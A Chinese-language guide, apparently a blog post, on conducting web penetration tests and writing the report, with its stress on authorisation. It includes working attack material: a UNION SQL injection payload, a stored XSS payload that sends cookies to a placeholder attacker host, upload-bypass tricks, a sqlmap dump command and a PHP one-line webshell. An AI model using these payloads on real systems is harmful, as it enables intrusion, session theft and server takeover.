Web 渗透测试不是 “工具跑一遍”,而是在合法授权下,以攻击者视角完整复现攻击链,输出可落地修复方案的安全评估工程。一篇高分博文 / 报告必须满足: ✅ 流程闭环:准备→信息收集→探测→利用→提权→清理→报告 ✅ 可复现:步骤清晰、Payload 可直接使用、截图规范 ✅ 合规底线:明确授权、不破坏数据、不越权测试 ✅ 价值导向:讲清漏洞原理、业务影响、修复建议 ✅ 前沿性:覆盖 2026 主流漏洞(API 安全、OAuth 配置错误、逻辑漏洞、AI 辅助测试)
一、测试准备:合规与范围(得分核心项)
1.1 授权与边界(必写)
- 测试类型:黑盒 / 灰盒 / 白盒
- 测试范围:域名 / IP / 端口 / 路径 / API(禁止越界)
- 禁止项:DDoS、数据窃取、生产环境写入、横向移动未授权网段
- 依据标准:PTES、OWASP Top10 2025、CVSS 3.1
1.2 工具清单(专业度体现)
- 信息收集:nmap、ffuf、whois、subfinder、amass
- 流量代理:Burp Suite Pro/Community
- 漏洞利用:sqlmap、dalfox、msfconsole
- 报告:Markdown、截图工具、漏洞评级表
二、信息收集:攻击面测绘(高分关键)
2.1 域名与主机
# 子域名枚举 subfinder -d target.com -o sub.txt # 端口与服务扫描(全端口+版本) nmap -sV -Pn -p- --open target.com -oN nmap.txt输出要点:IP、开放端口、服务版本、中间件(Nginx/Apache/Tomcat)、技术栈(PHP/Java/Node.js)。
2.2 目录与接口爆破
ffuf -u http://target.com/FUZZ -w dict.txt -fc 404重点收集:后台、登录页、上传接口、API 文档、配置文件、备份文件。
2.3 敏感信息泄露
- 源码注释、JS 硬编码密钥、测试环境入口
- robots.txt、.git、.env、info.php
- 错误页泄露路径 / 数据库配置
高分技巧:信息收集决定漏洞数量,不要跳过此环节直接扫漏洞。
三、漏洞探测:自动化 + 手工验证(拒绝假阳性)
3.1 通用检测流程
- 代理抓包,梳理参数与请求
- 自动化扫描定位可疑点
- 手工验证:修改参数、构造 Payload、观察响应
- 按高危→中危→低危→信息排序
3.2 2026 高频漏洞复现(直接可写进报告)
🔴 高危:SQL 注入(GET/POST/ 盲注)
- 漏洞点:
/product.php?id=1 - Payload:
1' union select 1,user(),3--+ - 验证:回显数据库账号 / 版本
- 利用:sqlmap 脱库、获取管理员密码 Hash
🔴 高危:未授权访问 + 水平越权
- 场景:用户 A 查看用户 B 数据
- Payload:
userid=1001→1002 - 判定:无需登录 / 越权即可读取敏感数据
🟠 中危:存储型 XSS
- Payload:`<script>fetch ('http://attacker/'+document.cookie) 危害:窃取 Cookie、劫持会话、仿冒操作
🟠 中危:文件上传绕过
- 绕过:修改 MIME、后缀双写、.php5、.phtml
- 验证:上传后可访问并执行 PHPinfo
🟡 低危:信息泄露、CORS 配置错误、点击劫持
评分点:每个漏洞必须配:原理→位置→Payload→截图→影响。
四、漏洞利用与权限提升(攻击链完整)
4.1 典型攻击链(高分模板)
- SQL 注入获取管理员账号密码
- 登录后台
- 上传 Webshell
- 服务器信息收集
- 内核 / 中间件漏洞提权
- 内网信息收集(授权范围内)
4.2 实战命令(可直接粘贴)
# SQL注入脱库 sqlmap -u "http://target.com/product.php?id=1" --dump # 一句话Shell(PHP) php @eval($_POST[cmd]);?>五、后渗透与清理(专业素养)
- 记录权限、路径、配置(不篡改、不删除)
- 删除上传的测试文件、Shell
- 恢复临时修改的参数
- 留存日志与截图用于报告
六、高分报告撰写(直接套用)
6.1 executive summary(高管必看)
- 测试目标与范围
- 漏洞统计:高危 X、中危 X、低危 X
- 核心风险:可接管后台、泄露用户数据
- 优先级建议:先修复高危,再加固中间件
6.2 漏洞详情模板(单条)
漏洞名称:SQL 注入漏洞风险等级:高危(CVSS 9.8)影响资产:http://target.com/product.php复现步骤:
- 访问链接
?id=1' - 观察报错,确认注入点
- 执行 Union 查询,回显数据库信息漏洞危害:窃取全库数据、脱库、获取服务器权限修复建议:
- 使用预编译语句 / PDO
- 输入过滤与白名单
- 最小权限运行数据库
6.3 漏洞汇总表
表格
| 等级 | 漏洞名称 | 数量 | 修复优先级 |
|---|---|---|---|
| 高危 | SQL 注入、未授权访问 | 2 | 立即 |
| 中危 | XSS、文件上传 | 2 | 3 天内 |
| 低危 | 信息泄露 | 1 | 7 天内 |
七、2026 加分项:AI 与 API 安全
- AI 辅助:大模型自动解析流量、生成 Payload、验证逻辑漏洞
- API 安全:未授权访问、越权、批量赋值、速率限制缺失
- OAuth 漏洞:redirect_uri 未校验、state 参数缺失
八、合规底线(必写,避免扣分)
- 所有测试必须获得书面授权
- 仅在测试环境 / 授权网段操作
- 不用于非法入侵、数据贩卖、恶意破坏
- 遵守《网络安全法》《数据安全法》
九、总结与学习路径
一篇高分 Web 渗透博文,拼的不是工具熟练度,而是流程规范、复现能力、报告价值、合规意识。 建议进阶方向:
- 吃透 OWASP Top10 与业务逻辑漏洞
- 熟练 Burp 插件、自定义 Payload
- 练习 API / 微服务 / 云原生安全
- 输出可落地的企业级报告